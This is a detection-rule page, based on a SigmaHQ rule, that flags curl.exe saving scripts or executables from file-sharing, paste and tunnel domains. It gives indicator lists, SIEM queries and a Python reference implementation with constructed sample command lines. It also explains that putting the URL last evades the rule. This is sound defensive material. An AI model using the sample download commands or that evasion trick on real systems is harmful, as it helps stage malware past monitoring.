Suspicious File Download From File Sharing Domain Via Curl.EXE

    Date: 10/26/2024

    Severity: High

    Summary

    Identifies potentially suspicious file downloads from file-sharing, paste and hosting domains using curl.exe, where the response is written to disk (-O, --remote-name or --output) and the command line ends in a script, installer or binary extension. Based on the SigmaHQ rule linked under Reference.

    Indicators of Compromise (IOC) List

    The indicators below are the selections of the referenced Sigma rule. A process-creation event is flagged only when every group matches (the groups are ANDed); within a group any one value is enough (ORed). All string matches are case-insensitive, which is the Sigma default.

    Image (suffix match on the full path) OR OriginalFileName (exact match), so a renamed curl binary is still caught by the original name carried in its PE version resource:

    - Image ends with '\curl.exe'
    - OriginalFileName is 'curl.exe'

    CommandLine contains any of these file-sharing, paste, CDN, tunnel or dynamic-DNS domains:

    - '.githubusercontent.com'
    - 'anonfiles.com'
    - 'cdn.discordapp.com'
    - 'ddns.net'
    - 'dl.dropboxusercontent.com'
    - 'ghostbin.co'
    - 'glitch.me'
    - 'gofile.io'
    - 'hastebin.com'
    - 'mediafire.com'
    - 'mega.nz'
    - 'onrender.com'
    - 'pages.dev'
    - 'paste.ee'
    - 'pastebin.com'
    - 'pastebin.pl'
    - 'pastetext.net'
    - 'pixeldrain.com'
    - 'privatlab.com'
    - 'privatlab.net'
    - 'send.exploit.in'
    - 'sendspace.com'
    - 'storage.googleapis.com'
    - 'storjshare.io'
    - 'supabase.co'
    - 'temp.sh'
    - 'transfer.sh'
    - 'trycloudflare.com'
    - 'ufile.io'
    - 'w3spaces.com'
    - 'workers.dev'

    CommandLine contains the URL scheme:

    - 'http'

    CommandLine contains one of the options that write the response to disk instead of stdout (' -O' also matches a lower-case ' -o' because matching is case-insensitive):

    - ' -O'
    - '--remote-name'
    - '--output'

    CommandLine ends with one of these extensions. Each is listed bare and with a trailing single or double quote so that a quoted output path at the end of the command line still matches. Because this is a suffix match, the rule only fires when the file name is the last token of the command line; a URL placed after the output path is not caught.

    - ".ps1", ".ps1'", '.ps1"'
    - ".dat", ".dat'", '.dat"'
    - ".msi", ".msi'", '.msi"'
    - ".bat", ".bat'", '.bat"'
    - ".exe", ".exe'", '.exe"'
    - ".vbs", ".vbs'", '.vbs"'
    - ".vbe", ".vbe'", '.vbe"'
    - ".hta", ".hta'", '.hta"'
    - ".dll", ".dll'", '.dll"'
    - ".psm1", ".psm1'", '.psm1"'

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    The queries below are a flattened rendering of the Sigma rule and should be checked against it before deployment. The rule requires all five groups (image, domain, 'http', output flag, extension) to match at once, whereas a single commandline In (...) list treats every value as an alternative; its values are also substring or suffix patterns rather than exact values, and the image condition is a suffix match on the full path. In addition, the double-quoted extension variants ('.ps1"', '.exe"' and so on) appear below as duplicated ".ps1", ".exe" entries because the trailing double quote was lost when the list was quoted. Implement the list as grouped contains/endswith conditions ANDed together.

    Detection Query 1 (Sysmon Event ID 1, process creation):

    (resourcename = "Sysmon"  AND eventtype = "1"  ) AND image = "\curl.exe" AND originalfilename = "curl.exe" AND commandline In (".githubusercontent.com","anonfiles.com","cdn.discordapp.com","ddns.net","dl.dropboxusercontent.com","ghostbin.co","glitch.me","gofile.io","hastebin.com","mediafire.com","mega.nz","onrender.com","pages.dev","paste.ee","pastebin.com","pastebin.pl","pastetext.net","pixeldrain.com","privatlab.com","privatlab.net","send.exploit.in","sendspace.com","storage.googleapis.com","storjshare.io","supabase.co","temp.sh","transfer.sh","trycloudflare.com","ufile.io","w3spaces.com","workers.dev","http"," -O","--remote-name","--output",".ps1",".ps1'",".ps1",".dat",".dat'",".dat",".msi",".msi'",".msi",".bat",".bat'",".bat",".exe",".exe'",".exe",".vbs",".vbs'",".vbs",".vbe",".vbe'",".vbe",".hta",".hta'",".hta",".dll",".dll'",".dll",".psm1",".psm1'",".psm1")

    Detection Query 2 (EDR process telemetry, Sysmon-style field names):

    (technologygroup = "EDR" ) AND image = "\curl.exe" AND originalfilename = "curl.exe" AND commandline In (".githubusercontent.com","anonfiles.com","cdn.discordapp.com","ddns.net","dl.dropboxusercontent.com","ghostbin.co","glitch.me","gofile.io","hastebin.com","mediafire.com","mega.nz","onrender.com","pages.dev","paste.ee","pastebin.com","pastebin.pl","pastetext.net","pixeldrain.com","privatlab.com","privatlab.net","send.exploit.in","sendspace.com","storage.googleapis.com","storjshare.io","supabase.co","temp.sh","transfer.sh","trycloudflare.com","ufile.io","w3spaces.com","workers.dev","http"," -O","--remote-name","--output",".ps1",".ps1'",".ps1",".dat",".dat'",".dat",".msi",".msi'",".msi",".bat",".bat'",".bat",".exe",".exe'",".exe",".vbs",".vbs'",".vbs",".vbe",".vbe'",".vbe",".hta",".hta'",".hta",".dll",".dll'",".dll",".psm1",".psm1'",".psm1")

    Detection Query 3 (Windows Security Event ID 4688; the command line is only recorded if the "Include command line in process creation events" audit policy is enabled):

    ((resourcename = "Windows Security"  AND eventtype = "4688"  ) AND newprocessname = "\curl.exe"  ) AND message IN (".githubusercontent.com","anonfiles.com","cdn.discordapp.com","ddns.net","dl.dropboxusercontent.com","ghostbin.co","glitch.me","gofile.io","hastebin.com","mediafire.com","mega.nz","onrender.com","pages.dev","paste.ee","pastebin.com","pastebin.pl","pastetext.net","pixeldrain.com","privatlab.com","privatlab.net","send.exploit.in","sendspace.com","storage.googleapis.com","storjshare.io","supabase.co","temp.sh","transfer.sh","trycloudflare.com","ufile.io","w3spaces.com","workers.dev","http"," -O","--remote-name","--output",".ps1",".ps1'",".ps1",".dat",".dat'",".dat",".msi",".msi'",".msi",".bat",".bat'",".bat",".exe",".exe'",".exe",".vbs",".vbs'",".vbs",".vbe",".vbe'",".vbe",".hta",".hta'",".hta",".dll",".dll'",".dll",".psm1",".psm1'",".psm1")

    Detection Query 4 (EDR process telemetry, 4688-style field names):

    (technologygroup = "EDR") AND newprocessname = "\curl.exe" AND message IN (".githubusercontent.com","anonfiles.com","cdn.discordapp.com","ddns.net","dl.dropboxusercontent.com","ghostbin.co","glitch.me","gofile.io","hastebin.com","mediafire.com","mega.nz","onrender.com","pages.dev","paste.ee","pastebin.com","pastebin.pl","pastetext.net","pixeldrain.com","privatlab.com","privatlab.net","send.exploit.in","sendspace.com","storage.googleapis.com","storjshare.io","supabase.co","temp.sh","transfer.sh","trycloudflare.com","ufile.io","w3spaces.com","workers.dev","http"," -O","--remote-name","--output",".ps1",".ps1'",".ps1",".dat",".dat'",".dat",".msi",".msi'",".msi",".bat",".bat'",".bat",".exe",".exe'",".exe",".vbs",".vbs'",".vbs",".vbe",".vbe'",".vbe",".hta",".hta'",".hta",".dll",".dll'",".dll",".psm1",".psm1'",".psm1")
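    The rule logic behind the IOC list and the four queries above, implemented as an added example in Python over constructed Sysmon-style process-creation records. This is illustration code written for this page, not Gurucul's query engine or the SigmaHQ rule file; the record field names are assumptions, and the sample events are made up. It keeps the five selections separate so an analyst can see which one a near-miss failed on, and includes the argument-order gap that the suffix match on extensions leaves open.

```python
"""Reference implementation of the curl.exe file-sharing download rule.

Example code added to this page; not Gurucul's or SigmaHQ's code.
"""
from dataclasses import dataclass

# Values copied from the rule's selections (see the IOC list above).
DOMAINS = (
    ".githubusercontent.com", "anonfiles.com", "cdn.discordapp.com", "ddns.net",
    "dl.dropboxusercontent.com", "ghostbin.co", "glitch.me", "gofile.io",
    "hastebin.com", "mediafire.com", "mega.nz", "onrender.com", "pages.dev",
    "paste.ee", "pastebin.com", "pastebin.pl", "pastetext.net", "pixeldrain.com",
    "privatlab.com", "privatlab.net", "send.exploit.in", "sendspace.com",
    "storage.googleapis.com", "storjshare.io", "supabase.co", "temp.sh",
    "transfer.sh", "trycloudflare.com", "ufile.io", "w3spaces.com", "workers.dev",
)
OUTPUT_FLAGS = (" -O", "--remote-name", "--output")
EXTENSIONS = (".ps1", ".dat", ".msi", ".bat", ".exe", ".vbs", ".vbe", ".hta", ".dll", ".psm1")
# Bare extension plus the single- and double-quoted variants, as in the rule,
# so a quoted output path at the very end of the command line still matches.
EXT_SUFFIXES = tuple(ext + q for ext in EXTENSIONS for q in ("", "'", '"'))


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (Sysmon EID 1 / EDR). Field names are assumptions."""
    image: str
    original_file_name: str
    command_line: str


def explain(ev: ProcessEvent) -> dict:
    """Evaluate each Sigma selection on its own (the rule needs all of them).

    Everything is lower-cased first: Sigma string modifiers are case-insensitive
    unless the |cased modifier is used.
    """
    img, ofn, cl = ev.image.lower(), ev.original_file_name.lower(), ev.command_line.lower()
    return {
        "selection_img": img.endswith("\\curl.exe") or ofn == "curl.exe",
        "selection_domain": any(d in cl for d in DOMAINS),
        "selection_http": "http" in cl,
        "selection_flags": any(f.lower() in cl for f in OUTPUT_FLAGS),
        "selection_extensions": cl.endswith(EXT_SUFFIXES),
    }


def matches_rule(ev: ProcessEvent) -> bool:
    """condition: all of selection_*"""
    return all(explain(ev).values())


def run_detection(events) -> list:
    """Return one verdict per event, in input order."""
    return [matches_rule(ev) for ev in events]


# Constructed sample telemetry (not real incident data).
SAMPLE_EVENTS = [
    # 1. Classic case: curl saves a remote-named .exe from a Discord CDN URL -> hit
    ProcessEvent(r"C:\Windows\System32\curl.exe", "curl.exe",
                 "curl.exe -O https://cdn.discordapp.com/attachments/1/2/update.exe"),
    # 2. Renamed binary: Image no longer ends in \curl.exe, but OriginalFileName
    #    (PE version resource) does, and the quoted .ps1 path ends the line -> hit
    ProcessEvent(r"C:\Users\Public\svc.exe", "curl.exe",
                 r'svc.exe https://pastebin.com/raw/abcd --output "C:\Users\Public\run.ps1"'),
    # 3. Same URL fetched to stdout (no output flag) -> no hit
    ProcessEvent(r"C:\Windows\System32\curl.exe", "curl.exe",
                 "curl.exe https://cdn.discordapp.com/attachments/1/2/update.exe"),
    # 4. Lower-case -o matches ' -O' case-insensitively, but the line ends in a
    #    share ID rather than a listed extension -> no hit
    ProcessEvent(r"C:\Windows\System32\curl.exe", "curl.exe",
                 r"curl.exe -o C:\Temp\notes.txt https://mega.nz/file/x"),
    # 5. Host not in the domain list -> no hit (the rule is scoped to listed hosts)
    ProcessEvent(r"C:\Windows\System32\curl.exe", "curl.exe",
                 "curl.exe -O https://example.com/tool.exe"),
    # 6. Known gap: output path first, URL last, so the suffix test on the
    #    command line fails -> no hit. Argument order alone evades this rule.
    ProcessEvent(r"C:\Windows\System32\curl.exe", "curl.exe",
                 r"curl.exe --output C:\Temp\a.exe https://transfer.sh/abc"),
]

if __name__ == "__main__":
    for ev, hit in zip(SAMPLE_EVENTS, run_detection(SAMPLE_EVENTS)):
        print("ALERT " if hit else "      ", ev.command_line)
```

    Case 6 is the one worth remembering when tuning: the rule's extension check is a suffix match on the whole command line, so a download that puts the URL after the output path is not flagged, while the same command with the arguments swapped is. If that gap matters in your environment, pair this rule with a broader curl-to-disk rule, or match the extension anywhere in the command line and accept the extra noise.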

    Reference:

    https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml 


    Tags

    Malware, Sigma
